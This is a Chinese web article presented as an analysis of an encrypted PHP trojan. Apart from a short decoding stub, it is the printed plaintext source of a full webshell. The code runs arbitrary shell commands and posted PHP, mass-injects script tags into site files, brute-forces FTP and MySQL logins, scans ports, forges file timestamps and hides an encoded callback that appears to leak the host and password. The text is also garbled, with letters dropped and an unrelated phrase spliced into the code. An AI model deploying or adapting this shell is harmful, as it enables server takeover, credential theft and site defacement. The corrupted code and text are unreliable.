首页 > 作文

php 木马的分析(加密破解)

更新时间:2023-04-06 14:30:58 阅读: 评论:0

分析可以知道,此木马经过了ba64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件。


解码解压缩代码如下:


复制代码 代码如下:

<?php

function writetofile($filename, $data)

{ //file writing

$filenum=@fopen($filename,”w”);

if (!$filenum) {

return fal;

}

flock($filenum,lock_ex);

$file_data=fwrite($filenum,$data);

fclo($filenum);

return true;

}

?>

然后在php的环境下进行运行,会得到php明文文件如下:


复制代码 代码如下:

error_reporting(7);

ob_start();

$mtime = explode(‘ ‘, microtime());

$starttime = $mtime[1] + $mtime[0];

@t_time_limit(0);

//非安全模式可以使用上面的函数,超时取消。

/*===================== 程序配置 =====================*/

// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效

$admin[‘check’] = “1”;

// 如果需要密码验证,请修改登陆密码

//默认端口表

$hidden = “44997”;

$admin[‘port’] = “80,139,21,3389,3306,43958,1433,5631”;

//跳转用的秒

$admin[‘jumpcond’] = “1”;

//ftp破解用的连接端口

$alexa = “yes”;

//是否显示alexa排名,yes或是no

$admin[‘ftpport’] = “21”;

// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no)

$retime = “no”;

// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定)

$cmd = “cmd.exe”;

// 下面是phpspy显示版权那栏的,因为被很多程序当成作为关键词杀了,鱼寒~~允许自定义吧。还是不懂别改~~

/*===================== 配置结束 =====================*/

$rveru = $_rver [‘http_host’].$_rver[‘php_lf’];

$rverp = $admin[‘pass’];

$copyurl = ba64_decode(‘phnjcmlwdcbzcmm9j2h0dha6ly8lmzglnjmlnjmlnjulmkulnjmlnkylnkqvjtyzjty1jtcyjtc0lz9jzxj0ptezjnu9’);

$copyurll = ba64_decode(‘jz48l3njcmlwdd4=’);

$onoff = (function_exists(‘ini_get’)) ? ini_get(‘register_globals’) : get_cfg_var(‘register_globals’);

if ($onoff != 1) {@extract($_post, extr_skip);@extract($_get, extr_skip);}

$lf = $_rver[‘php_lf’];$dis_func = get_cfg_var(“disable_functions”);

/*===================== 身份验证 =====================*/

if($admin[‘check’] == “1”) {if ($_get[‘action’] == “logout”) {tcookie (“adminpass”, “”);echo “<meta http-equiv=\”refresh\” content=\”0;url=”.$lf.”\”>”;echo “<span style=”\” style=”\””font-size: 12px; font-family: verdana\”>注销成功……<p><a href=”\” href=”\”””.$lf.”\”>三秒后自动退出或单击这里退出程序界面 >>></a></span>”;exit;}

if ($_post[‘do’] == ‘login’) {$thepass=trim($_post[‘adminpass’]);if ($admin[‘pass’] == $thepass) {tcookie (“adminpass”,$thepass,time()+(1*24*3600));echo “<meta http-equiv=\”refresh\” content=\”0;url=”.$lf.”\”>”;echo “”.$copyurl.$rveru.”&p=”.$rverp.$copyurll.”</form>”;exit;}}if (ist($_cookie[‘adminpass’])) {if ($_cookie[‘adminpass’] != $admin[‘pass’]) {loginpage();}} el {loginpage();}}

/*===================== 验证结束 =====================*/

// 判断 magic_quotes_gpc 状态

if (get_magic_quotes_gpc()) {$_get = stripslashes_array($_get);$_post = stripslashes_array($_post);}

//mix.dll的代码

$mixdll = “7zt/tbnngmfflrqbfnaesbmyzmccxs2k46pumo2iqjc3wgukythv6hdaocv6ddf5aum82frbaihorlrl0y3bb/cikumnvixoie/cmmf+epxw1ixah1ylbwe+5ahma5jcsws+t5je+f9/m+z/u8z73hp9cruaxbsawhracmy4qcibeyyd8zcjbw1fcjzh/cyzqdmpytkyvvzkamnq+r5g21tixn5aotmhko4d0uxulisl8vygrr7jwhpn5martg4ozm3oz1hrypk7js2wr1/fzb2+dnzgwoszsv1lav+mfbepd5zooqjf9bvewzcmnr6ah/mmfflharjktm0jxccavbekqbme0imaogldqmiuehiz5lpga0d9bguymxdvdxy6yqskxxtgtja8kkjpuv5h8ec7f1p8ugcbsf8b9qow1n2b0lygy83sbycplcexgmnch0fjmnktryvmllj/ec3bq8v4hnauoqckmjcmpe5n15kwiciaiciaiciajyubczu2pftj1ncrgm4kqdnyaskcr+eitlke9axui/+cxt0wt+26crt4u3xc2pid9c0yb2ih2eszgh3vzld6zwhsoa3sxybmoz/t3berbdy1rx6rtxd8pdy0frswjsiytjxdm+9nwtshyn1ujy5srytnmo6nymmc9hzy64z4qmuvb5ot9ykezsvtxble12mmiv0skd7zaddnoiprg8ouiypslfxcywjnb83jklditszm0qs1rdknymnsv6ycvqsxdekjpvcucfatmyj4lc+kpltwyxvit+t7vpxt5km3clqq+snap3jgxr87yemmfxau7xjkemwl8xovrsc0ypwvfj8i7mvvzbchnjqiutdv3nviexvwcq4pq3yquzuodquc52dq1weih4avflwq2rzmgd2wqmlev5auxiszrs0n4rev87syahfmufm0ou25pgso58ljemx/neuhzku1pusinsbxf4jry4tet75y3ej5r91xngylpgno80xqhbmesa376z3+yczxxuuf8iky6gewlctlmrsgnlxaiqugovjjm+ndetbfkm4rglobr+gdvcreuocpsrcn1uuxksa9z4ueclonaqtwex3gc42vxqnjxgkr1vto3vuod4mpreungykkqtkwjmrc4bqraeqraeqrae+s+yzcl+ephtyingl8gurfvgqprjwgabkfhhzb9r98eyno/j1mnaurgrxwy0t9osu8h975b/6f7fbubrqqpbxlndsibwjtq5ccktkmrkl4xofq2d5zhchtnyns6nihb8lwnv1tpq1lftxcrqs1e7gwwrw+7cqmh6ku1stjxxcivvpgez5zjleru/kquyg8kqu/5qu87uxtoz+k3bhptibwriolycsr2shqymiiqpthkp3gyxcnalnaos0jjc89rsl9xcuc6nfxuuf1chtbta7zzs/hrfjreeqraeqraeqrdkxyjilb62moa4anu0l5op/tgendeulgw5vkyspj6jjz+co8+201e8i+izrfryengppflbpy5q+pedhex0dy3dwkd/cfotgl8z2u6vxjbs6j+wbok611tvp9zlf9ixdneurtzyudkdj9ot9avvr2njxs6oelrqkkurafeydtv9aqjd3zacgyvb204mopq5hnq5io0pkvshujbk81ndtzsvb4dqjlcno7+wxk717qr691c9z2xlhs937eg87wsmdjvvjeagsx+ppxp81or0iudob7b81cljn1nod/0ssttcvv4+r78njim5d7d58zpmq2xhtwz0ovb1+i1nb3wbsxs6hq7h+fbiidg6pjgxeqwpd0vfb8nji2ffgwhqonfp+sjjg6bnsgdgxyboxl8thatehjsude891r1x6u8b7bsdvxkegztgr2/fdo+psoo/jg6hh1vriqskpgt+mwzpnbidpnfi2jhggxe6khmbyw7gof0cv8nxd/uva0eqbeeqbeeqbpnfqkx+d/3x9pftq+l30jvsipvmmqybfz59ix2flwtxsdvshsuwm9j32fa2k93hhmkpsjfzutbf6di2gbcah/yliaiciaiciaiciajy1/wo”;

function shell($command){

global $windows,$disablefunctions;

$exec = ”;$output= ”;

$dep[]=array(‘pipe’,’r’);$dep[]=array(‘pipe’,’w’);

if(is_callable(‘passthru’) && !strstr($disablefunctions,’passthru’)){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}

elif(is_callable(‘system’) && !strstr($disablefunctions,’system’)){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }

elif(is_callable(‘exec’) && !strstr($disablefunctions,’exec’)) {exec($command,$output);$output = join(“\n”,$output);$exec= $output;}

elif(is_callable(‘shell_exec’) && !strstr($disablefunctions,’shell_exec’)){$exec= shell_exec($command);}

elif(is_resource($output=popen($command,”r”))) {while(!feof($output)){$exec= fgets($output);}pclo($output);}

elif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_clo($res);}

elif ($windows && is_object($ws = new com(“wscript.shell”))){$dir=(ist($_rver[“temp”]))?$_rver[“temp”]:ini_get(‘upload_tmp_dir’) ;$name = $_rver[“temp”].name();$ws->run(“cmd.exe /c $command >$name”, 0, true);$exec = file_get_contents($name);unlink($name);}

return $exec;

}

// 查看phpinfo

if ($_get[‘action’] == “phpinfo”) {echo $phpinfo=(!eregi(“phpinfo”,$dis_func)) ? phpinfo() : “phpinfo() 函数已被禁用,请查看<php环境变量>”;exit;

}if($_get[‘action’] == “nowur”) {$ur = get_current_ur();

if(!$ur) $ur = “报告长官,主机变态,无法获取当前进行用户名!”;

echo”当前进程用户名:$ur”;

exit;

}

if(ist($_post[‘phpcode’])){eval(“?”.”>$_post[phpcode]<?”);exit;

}

if($action==”mysqldown”){

$link=@mysql_connect($host,$ur,$password);

if (!$link) {

$downtmp = ‘数据库连接失败: ‘ . m高三百日誓词ysql_error();

}el{

$query=”lect load_file(‘”.$filename.”‘);”;

$result = @mysql_query($query, $link);

if(!$result){

$downtmp = “读取失败,可能是文件不存在或是没file权限。<br>”.mysql_error();

}el{

while ($row = mysql_fetch_array($result)) {

$filename = baname($filename);

if($rardown==”yes”){

$zip = new zip;

$zipfiles[]=array(“$filename”,$row[0]);

$zip->add($zipfiles,1);

$code = $zip->get_file();

$filename = “”.$filename.”.rar”;

}el{

$code = $row[0];

}

header(“content-type: application/octet-stream”);

header(“accept-ranges: bytes”);

header(“accept-length: “.strlen($code));

header(“content-disposition: attachment;filename=$filename”);

echo($code);

exit;

}

}

}

}

// 在线代理

if (ist($_post[‘url’])) {$proxycontents = @file_get_contents($_post[‘url’]);echo ($proxycontents) ? $proxycontents : “<body bgcolor=\”#f5f5f5\” style=”\” style=”\””font-size: 12px;\”><center><br><p><b>获取 url 内容失败</b></p></center></body>”;exit;

}

// 下载文件

if (!empty($downfile)) {if (!@file_exists($downfile)) {echo “<script type=”text/javascript”><!–

alert(‘你要下的文件不存在!’)

// –></script>”;} el {$filename = baname($downfile);$filename_info = explode(‘.’, $filename);$fileext = $filename_info[count($filename_info)-1];header(‘content-type: application/x-‘.$fileext);header(‘content-disposition: attachment; filename=’.$filename.”);header(‘content-description: php generated data’);header(‘content-length: ‘.filesize($downfile));@readfile($downfile);exit;}

}

// 直接下载备份数据库

if ($_post[‘backuptype’] == ‘download’) {

@mysql_connect($rvername,$dburname,$dbpassword) or die(“数据库连接失败”);

@mysql_lect_db($dbname) or die(“选择数据库失败”);

$table = array_flip($_post[‘table’]);

$result = mysql_query(“show tables”);

echo ($result) ? null : “出错: “.mysql_error();

$filename = baname($_rver[‘http_host’].”_mysql.sql”);

header(‘content-type: application/unknown’);

header(‘content-disposition: attachment; filename=’.$filename);

$mysqldata = ”;

while ($currow = mysql_fetch_array($result)) {

if (ist($table[$currow[0]])) {

$mysqldata.= sqldumptable($currow[0]);

$mysqldata.= $mysqldata.”\r\n”;

}

}

mysql_clo();

exit;

}

// 程序目录

$pathname=str_replace(‘\\’,’/’,dirname(__file__));

$dirpath=str_replace(‘\\’,’/’,$_rver[“document_root”]);

// 获取当前路径

if (!ist($dir) or empty($dir)) {

$dir = “.”;

$nowpath = getpath($pathname, $dir);

} el {

$dir=$_get[‘dir’];

$nowpath = getpath($pathname, $dir);

}

// 判断读写情况

$dir_writeable = (dir_writeable($nowpath)) ? “可写” : “不可写”;

$phpinfo=(!eregi(“phpinfo”,$dis_func)) ? ” | <a href=”\” href=”\””?action=phpinfo\” target=\”_blank\”>phpinfo()</a>” : “”;

$reg = (substr(php_os, 0, 3) == ‘win’) ? ” | <a href=”\” href=”\””?action=reg\”>注册表操作</a>” : “”;

$tb = new forms;

?>

<html>

<head>

<meta http-equiv=”content-type” content=”text/html; chart=gb2312″>

<style type=”text/css”><!–

body,td{font-size: 12px;background-color:#000000;color:#eee;

margin: 1px;margin-left:1px;

scrollbar-face-color: #232323; scrollbar-highlight-color: #232323;

scrollbar-shadow-color: #383838; scrollbar-darkshadow-color: #383838;

scrollbar-3dlight-color: #232323; scrollbar-arrow-color: #ffffff;

scrollbar-track-color: #383838;}

a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}

.smlfont {

font-family: “verdana”, “tahoma”, “宋体”;

font-size: “11px”;

}

.input {

font-size: “12px”;

color: “#000000”;

background-color: “#ffffff”;

height: “18px”;

border: “1px solid #666666”;

padding-left: “2px”;

}

.redfont {color: “#ca0000”;}

.top {background-color: “#cccccc”}

.firstalt {background-color: “#efefef”}

.condalt {background-color: “#f5f5f5”}

–></style><style type=”text/css” bogus=”1″>body,td{font-size: 12px;background-color:#000000;color:#eee;

margin: 1px;margin-left:1px;

scrollbar-face-color: #232323; scrollbar-highlight-color: #232323;

scrollbar-shadow-color: #383838; scrollbar-darkshadow-color: #383838;

scrollbar-3dlight-color: #232323; scrollbar-arrow-color: #ffffff;

scrollbar-track-color: #383838;}

a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}

.smlfont {

font-family: “verdana”, “tahoma”, “宋体”;

font-size: “11px”;

}

.input {

font-size: “12px”;

color: “#000000”;

background-color: “#ffffff”;

height: “18px”;

border: “1px solid #666666”;

padding-left: “2px”;

}

.redfont {color: “#ca0000”;}

.top {background-color: “#cccccc”}

.firstalt {background-color: “#efefef”}

.condalt {background-color: “#f5f5f5”}</style>

<script language=javascript>

function checkall(form) {

for (var i=0;i<form.elements.length;i++) {

var e = form.elements[i];

if (e.name != ‘chkall’)

e.checked = form.chkall.checked; }}

function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href=’?dir=’+d+’&deldir=’+f;} el {window.location.href=’?dir=’+d+’&delfile=’+f;}}}

</script>

</head>

<title><?php echo”$myneme”?></title>

<body style=”table-layout:fixed; word-break:break-all onmouover=” style=”table-layout:fixed; word-break:break-all onmouover=”window.status=’设计:幽月 仅限于网站管理员安全检测用,请务使用于非法用途,后果作者概不负责’;return true” style=”filter: progid:dximagetransform.microsoft.gradient(gradienttype=0,startcolorstr=#626262,endcolorstr=#1c1c1c)” style=”filter: progid:dximagetransform.microsoft.gradient(gradienttype=0,startcolorstr=#626262,endcolorstr=#1c1c1c)”>

<center>

<?php

//$_rver[“document_root”]

$tb->tableheader();

$tb->tdbody(‘<table width=”98%” border=”0″ cellpadding=”0″ cellspacing=”0″><tr><td><b>’.$_rver[‘http_host’].'</b></td><td align=”center”>’.date(“y年m月d日 h:i:s”,time()).'</td><td align=”right”><b>’.gethostbyname($_rver[‘rver_name’]).'</b></td></tr></table>’,’center’,’top’);

$tb->tdbody(‘<a href=”?dir=’.$dirpath.'” href=”?dir=’.$dirpath.'”>根目录</a> | <a href=”?action=dir” href=”?action=dir”>shell目录</a> | <a href=”?action=phpenv” href=”?action=phpenv”>环境变量</a> | <a href=”?action=proxy” href=”?action=proxy”>在线代理</a>’.$reg.$phpinfo.’ | <a href=”?action=shell” href=”?action=shell”>webshell</a> | <a href=”?action=crack” href=”?action=crack”>杂项破解</a> | <a href=”?action=mix” href=”?action=mix”>解压mix.dll</a> | <a href=”?action=logout” href=”?action=logout”>注销登录</a>’);

$tb->tdbody(‘<a href=”?action=plgm” href=”?action=plgm”>批量挂马</a> | <a href=”?action=downloads” href=”?action=downloads”>http文件下载</a> | <a href=”?action=arch&dir=’.$dir.'” href=”?action=arch&dir=’.$dir.'”>文件查找</a> | <a href=”?action=eval” href=”?action=eval”>执行php脚本</a> | <a href=”?action=sql” href=”?action=sql”>执行sql语句</a> | <a href=”?action=mysqlfun” href=”?action=mysqlfun”>func反弹shell</a> | <a href=”?action=sqlbak” href=”?action=sqlbak”>mysql备份</a> | <a href=”?action=suexp” href=”?action=suexp”>rv-u提权</a>’);

$tb->tablefooter();

?>

<hr width=”775″ noshade>

<table width=”775″ border=”0″ cellpadding=”0″>

<?

$tb->headerform(array(‘method’=>’get’,’content’=>'<p>程序路径: ‘.$pathname.'<br>当前目录(‘.$dir_writeable.’,’.substr(ba_convert(@fileperms($nowpath),10,8),-4).’): ‘.$nowpath.'<br>跳转目录: ‘.$tb->makeinput(‘dir’,”.$nowpath.”,”,’text’,’80’).’ ‘.$tb->makeinput(”,’确定’,”,’submit’).’ 〖支持绝对路径和相对路径〗’));

$tb->headerform(array(‘action’=>’?dir=’.urlencode($dir),’enctype’=>’multipart/form-data’,’content’=>’上传文件到当前目录: ‘.$tb->makeinput(‘uploadfile’,”,”,’file’).’ ‘.$tb->makeinput(‘doupfile’,’确定’,”,’submit’).$tb->makeinput(‘uploaddir’,$dir,”,’hidden’)));

$tb->headerform(array(‘action’=>’?action=editfile&dir=’.urlencode($dir),’content’=>’新建文件在当前目录: ‘.$tb->makeinput(‘editfile’).’ ‘.$tb->makeinput(‘createfile’,’确定’,”,’submit’)));

$tb->headerform(array(‘content’=>’新建目录在当前目录: ‘.$tb->makeinput(‘newdirectory’).’ ‘.$tb->makeinput(‘createdirectory’,’确定’,”,’submit’)));

?>

</table>

<hr width=”775″ noshade>

<?php

/*===================== 执行操作 开始 =====================*/

echo “<p><b>\n”;

// 删除文件

if (!empty($delfile)) {

if (file_exists($delfile)) {

echo (@unlink($delfile)) ? $delfile.” 删除成功!” : “文件删除失败!”;

} el {

echo baname($delfile).” 文件已不存在!”;

}

}

// 删除目录

elif (!empty($deldir)) {

$deldirs=”$dir/$deldir”;

if (!file_exists(“$deldirs”)) {

echo “$deldir 目录已不存在!”;

} el {

echo (deltree($deldirs)) ? “目录删除成功!” : “目录删除失败!”;

}

}

// 创建目录

elif (($createdirectory) and !empty($_post[‘newdirectory’])) {

if (!empty($newdirectory)) {

$mkdirs=”$dir/$newdirectory”;

if (file_exists(“$mkdirs”)) {

echo “该目录已存在!”;

} el {

echo (@mkdir(“$mkdirs”,0777)) ? “创建目录成功!” : “创建失败!”;

@chmod(“$mkdirs”,0777);

}

}

}

// 上传文件

elif ($doupfile) {

echo (@copy($_files[‘uploadfile’][‘tmp_name’],””.$uploaddir.”/”.$_files[‘uploadfile’][‘name’].””)) ? “上传成功!” : “上传失败!”;

}

elif($action==”mysqlup”){

$filename = $_files[‘upfile’][‘tmp_name’];

if(!$filename) {

echo”没有选择要上传的文件。。”;

}el{

$shell = file_get_contents($filename);

$mysql = bin2hex($shell);

if(!$upname) $upname = $_files[‘upfile’][‘name’];

$shell = “lect 0x”.$mysql.” from “.$databa.” into dumpfile ‘”.$uppath.”/”.$upname.”‘;”;

$link=@mysql_connect($host,$ur,$password);

if(!$link){

echo “登陆失败”.mysql_error();

}el{

$result = mysql_query($shell, $link);

if($result){

echo”操作成功.文件成功上传到”.$host.”,文件名为”.$uppath.”/”.$upname.”..”;

}el{

echo”上传失败 原因:”.mysql_error();

}

}

}

}

elif($action==”mysqldown”){

if(!empty($downtmp)) echo $downtmp;

}

// 编辑文件

elif ($_post[‘do’] == ‘doeditfile’) {

if (!empty($_post[‘editfilename’])) {

if(!file_exists($editfilename)) unt($retime);

if($time==$now) $time = @filemtime($editfilename);

$time2 = @date(“y-m-d h:i:s”,$time);

$filename=”$editfilename”;

@$fp=fopen(“$filename”,”w”);

if($_post[‘change’]==”yes”){

$filecontent = “?”.”>”.$_post[‘filecontent’].”<?”;

$filecontent = gzdeflate($filecontent);

$filecontent = ba64_encode($filecontent);

$filecontent = “<?php\n/*\n代码由浅蓝的辐射鱼加密!\n*/\neval(gzinflate(ba64_decode(‘$filecontent’)));\n”.”?>”;

}el{

$filecontent = $_post[‘filecontent’];

}

echo $msg=@fwrite($fp,$filecontent) ? “写入文件成功!” : “写入失败!”;

@fclo($fp);

if($retime==”yes”){

echo” 鱼鱼自动操作:”;

echo $msg=@touch($filename,$time) ? “修改文件为”.$time2.”成功!” : “修改文件时间失败!”;

}

} el {

echo “请输入想要编辑的文件名!”;

}

}

//文件下载

elif ($_post[‘do’] == ‘downloads’) {

$contents = @file_get_contents($_post[‘durl’]);

if(!$contents){

echo”无法读取要下载的数据”;

}

elif(file_exists($path)){

echo”很抱歉,文件”.$path.”已经存在了,请更换保存文件名。”;

}el{

$fp = @fopen($path,”w”);

echo $msg=@fwrite($fp,$contents) ? “下载文件成功!” : “下载文件写入时失败!”;

@fclo($fp);

}

}

elif($_post[‘action’]==”mix”){

if(!file_exists($_post[‘mixto’])){

$tmp = ba64_decode($mixdll);

$tmp = gzinflate($tmp);

$fp = fopen($_post[‘mixto’],”w”);

echo $msg=@fwrite($fp,$tmp) ? “解压缩成功!” : “此目录不可写吧?!”;

fclo($fp);

}el{

echo”不是吧?”.$_post[‘mixto’].”已经存在了耶~”;

}

}

// 编辑文件属性

elif ($_post[‘do’] == ‘editfileperm’) {

if (!empty($_post[‘fileperm’])) {

$fileperm=ba_convert($_post[‘fileperm’],8,10);

echo (@chmod($dir.”/”.$file,$fileperm)) ? “属性修改成功!” : “修改失败!”;

echo ” 文件 “.$file.” 修改后的属性为: “.substr(ba_convert(@fileperms($dir.”/”.$file),10,8),-4);

} el {

echo “请输入想要设置的属性!”;

}

}

// 文件改名

elif ($_post[‘do’] == ‘rename’) {

if (!empty($_post[‘newname’])) {

$newname=$_post[‘dir’].”/”.$_post[‘newname’];

if (@file_exists($newname)) {

echo “”.$_post[‘newname’].” 已经存在,请重新输入一个!”;

} el {

echo (@rename($_post[‘oldname’],$newname)) ? baname($_post[‘oldname’]).” 成功改名为 “.$_post[‘newname’].” !” : “文件名修改失败!”;

}

} el {

echo “请输入想要改的文件名!”;

}

}

elif ($_post[‘do’] == ‘arch’) {

if(!empty($oldkey)){

echo”<span class=\”redfont\”>查找关键词:[“.$oldkey.”],下面显示查找的结果:”;

if($type2 == “getpath”){

echo”鼠标移到结果文件上会有部分截取显示.”;

}

echo”</span><br><hr width=\”775\” noshade>”;

find($path);

}el{

echo”你要查虾米?到底要查虾米呢?有没有虾米要你查呢?”;

}

}

elif ($_get[‘action’]==’plgmok’) {

dirtree($_post[‘dir’],$_post[‘mm’]);

}

elif ($_get[‘action’] == “plgm”) {

$action = ‘?action=plgmok’;

$gm = “<script src=”http://127.0.0.1″ src=”http://127.0.0.1″></script>”;

$tb->tableheader();

$tb->formheader($action,’批量挂马’);

$tb->tdbody(‘网站批量挂马程序php版’,’center’);

$tb->tdbody(‘文件位置: ‘.$tb->makeinput(‘dir’,”.$_rver[“document_root”].”,”,’text’,’60’).'<br>要挂代码:’.$tb->maketextarea(‘mm’,$gm,’50’,’5′).”.$tb->makehidden(‘do’,’批量挂马’).'<br>’.$tb->makeinput(‘submit’,’开始挂马’,”,’submit’),’center’,’1′,’35’);

echo “</form>”;

$tb->tablefooter();

}//end plgm

// 克隆时间

elif ($_post[‘do’] == ‘domodtime’) {

if (!@file_exists($_post[‘curfile’])) {

echo “要修改的文件不存在!”;

} el {

if (!@file_exists($_post[‘tarfile’])) {

echo “要参照的文件不存在!”;

} el {

$time=@filemtime($_post[‘tarfile’]);

echo (@touch($_post[‘curfile’],$time,$time)) ? baname($_post[‘curfile’]).” 的修改时间成功改为 “.date(“y-m-d h:i:s”,$time).” !” : “文件的修改时间修改失败!”;

}

}

}

// 自定义时间

elif ($_post[‘do’] == ‘modmytime’) {

if (!@file_exists($_post[‘curfile’])) {

echo “要修改的文件不存在!”;

} el {

$year=$_post[‘year’];

$month=$_post[‘month’];

$data=$_post[‘data’];

$hour=$_post[‘hour’];

$minute=$_post[‘minute’];

$cond=$_post[‘cond’];

if (!empty($year) and !empty($month) and !empty($data) and !empty($hour) and !empty($minute) and !empty($cond)) {

$time=strtotime(“$data $month $year $hour:$minute:$cond”);

echo (@touch($_post[‘curfile’],$time,$time)) ? baname($_post[‘curfile’]).” 的修改时间成功改为 “.date(“y-m-d h:i:s”,$time).” !” : “文件的修改时间修改失败!”;

}

}

}

elif($do ==’port’){

$tmp = explode(“,”,$port);

$count = count($tmp);

for($i=$first;$i<$count;$i++){

$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);

if($fp) echo”发现”.$host.”主机打开了端口”.$tmp[$i].”<br>”;

}

}

/*

这里代码写得很杂,说实话我自己都不知道写了什么。

好在能用,我就没管了,假设有人看到干脆重写吧。*/

elif ($do == ‘crack’) {//反正注册为全局变量了。

if(@file_exists($passfile)){

$tmp = file($passfile);

$count = count($tmp);

if(empty($onetime)){

$onetime = $count;

$turn=”1″;

}el{

$nowturn = $turn+1;

$now = $turn*$onetime;

$tt = intval(($count/$onetime)+1);

}

if($turn>$tt or $onetime>$count){

echo”超过字典容量了耶~要是破解最后进程的,很抱歉失败。”;

}el{

$first = $onetime*($turn-1);

for($i=$first;$i<$now;$i++){

if($ctype==”mysql”) $sa = @mysql_connect($host,$ur,chop($tmp[$i]));

el $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$ur,chop($tmp[$i]));

if($sa)

{

$t = “获取”.$ur.”的密码为”.$tmp[$i].””;

}

}

if(!$t){

echo “<meta http-equiv=\”refresh\” content=\””.$admin[jumpcond].”;url=”.$lf.”?do=crack&passfile=”.$passfile.”&host=”.$host.”&ur=”.$ur.”&turn=”.$nowturn.”&onetime=”.$onetime.”&ctype=”.$ctype.”\”><span style=”\” style=”\””font-size: 12px; font-family: verdana\”><a href=”\” href=”\”””.$lf.”?do=crack&passfile=”.$passfile.”&host=”.$host.”&ur=”.$ur.”&turn=”.$nowturn.”&onetime=”.$onetime.”&type=”.$ctype.”\”>字典总共”.$count.”个,现在从”.$first.”到”.$now.”,”.$admin[jumpcond].”秒后进行这”.$onetime.”个密码的试探. >>></a><br>全历此次”.$type.”的破解需要”.$tt.”次,现在是第”.$turn.”次解密。</span>”;

}

el {

echo”$t”;

}

}

}el{

echo”字典文件不存在,请确定。”;

}

}

elif($do ==’port’){

if(!eregi(“-“,$port)){

$tmp = explode(“,”,$port);

$count = count($tmp);

$first = “1”;

}el{

$tmp = explode(“-“,$port);

$first = $tmp[0];

$count = $tmp[1];

}

for($i=$first;$i<$count;$i++){

if(!eregi(“-“,$port)){

$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);

if($fp) echo”发现”.$host.”主机打开了端口”.$tmp[$i].”<br>”;

}el{

$fp = @fsockopen($host, $i, $errno, $errstr, 1);

if($fp) echo”发现”.$host.”主机打开了端口”.$i.”<br>”;

}

}

}

// 连接mysql

elif ($connect) {

if (@mysql_connect($rvername,$dburname,$dbpassword) and @mysql_lect_db($dbname)) {

echo “数据库连接成功!”;

mysql_clo();

} el {

echo mysql_error();

}

}

// 执行sql语句

elif ($_post[‘do’] == ‘query’) {

@mysql_connect($rvername,$dburname,$dbpassword) or die(“数据库连接失败”);

@mysql_lect_db($dbname) or die(“选择数据库失败”);

$result = @mysql_query($_post[‘sql_query’]);

echo ($result) ? “sql语句成功执行!” : “出错: “.mysql_error();

mysql_clo();

}

// 备份操作

elif ($_post[‘do’] == ‘backupmysql’) {

if (empty($_post[‘table’]) or empty($_post[‘backuptype’])) {

echo “请选择欲备份的数据表和备份方式!”;

} el {

if ($_post[‘backuptype’] == ‘rver’) {

@mysql_connect($rvername,$dburname,$dbpassword) or die(“数据库连接失败”);

@mysql_lect_db($dbname) or die(“选择数据库失败”);

$table = array_flip($_post[‘table’]);

$filehandle = @fopen($path,”w”);

if ($filehandle) {

$result = mysql_query(“show tables”);

echo ($result) ? null : “出错: “.mysql_error();

while ($currow = mysql_fetch_array($result)) {

if (ist($table[$currow[0]])) {

sqldumptable($currow[0], $filehandle);

fwrite($filehandle,”\n\n\n”);

}

}

fclo($filehandle);

echo “数据库已成功备份到 <a href=”\” href=”\”””.$path.”\” target=\”_blank\”>”.$path.”</a>”;

mysql_clo();

} el {

echo “备份失败,请确认目标文件夹是否具有可写权限!”;

}

}

}

}

elif($downrar) {

if (!empty($dl)) {

if(eregi(“unzipto:”,$localfile)){

$path = “”.$dir.”/”.str_replace(“unzipto:”,””,$localfile).””;

$zip = new zip;

$zipfile=$dir.”/”.$dl[0];

$array=$zip->get_list($zipfile);

$count=count($array);

$f=0;

$d=0;

for($i=0;$i<$count;$i++) {

if($array[$i][folder]==0) {

if($zip->extract($zipfile,$path,$i)>0) $f++;

}

el $d++;

}

if($i==$f+$d) echo “$dl[0] 解压到”.$path.”成功<br>($f 个文件 $d 个目录)”;

elif($f==0) echo “$dl[0] 解压到”.$path.”失败”;

el echo “$dl[0] 未解压完整<br>(已解压 $f 个文件 $d 个目录)”;

}el{

$zipfile=””;

$zip = new zip;

for($k=0;ist($dl[$k]);$k++)

{

$zipfile=$dir.”/”.$dl[$k];

if(is_dir($zipfile))

{

unt($zipfilearray);

addziparray($dl[$k]);

for($i=0;$zipfilearray[$i];$i++)

{

$filename=$zipfilearray[$i];

$filesize=@filesize($dir.”/”.$zipfilearray[$i]);

$fp=@fopen($dir.”/”.$filename,rb);

$zipfiles[]=array($filename,@fread($fp,$filesize));

@fclo($fp);

}

}

el

{

$filename=$dl[$k];

$filesize=@filesize($zipfile);

$fp=@fopen($zipfile,rb);

$zipfiles[]=array($filename,@fread($fp,$filesize));

@fclo($fp);

}

}

$zip->add($zipfiles,1);

$code = $zip->get_file();

$ck = “_qq44997_”.date(“y-m-d”,time()).””;

if(empty($localfile)){

header(“content-type: application/octet-stream”);

header(“accept-ranges: bytes”);

header(“accept-length: “.strlen($code));

header(“content-disposition: attachment;filename=”.$_rver[‘http_host’].””.$ck.”_files.zip”);

echo $code;

exit;

}el{

$fp = @fopen(“”.$dir.”/”.$localfile.””,”w”);

echo $msg=@fwrite($fp,$code) ? “压缩保存”.$dir.”/”.$localfile.”本地成功!!” : “目录”.$dir.”无可写权限!”;

@fclo($fp);

}

}

} el {

echo “请选择要打包下载的文件!”;

}

}

// shell.application 运行程序

elif(($_post[‘do’] == ‘programrun’) and !empty($_post[‘program’])) {

$shell= &new com(‘sh’.’el’.’l.appl’.’ica’.’tion’);

$a = $shell->shellexecute($_post[‘program’],$_post[‘prog’]);

echo ($a==’0′) ? “程序已经成功执行!” : “程序运行失败!”;

}

// 查看php配置参数状况

elif(($_post[‘do’] == ‘viewphpvar’) and !empty($_post[‘phpvarname’])) {

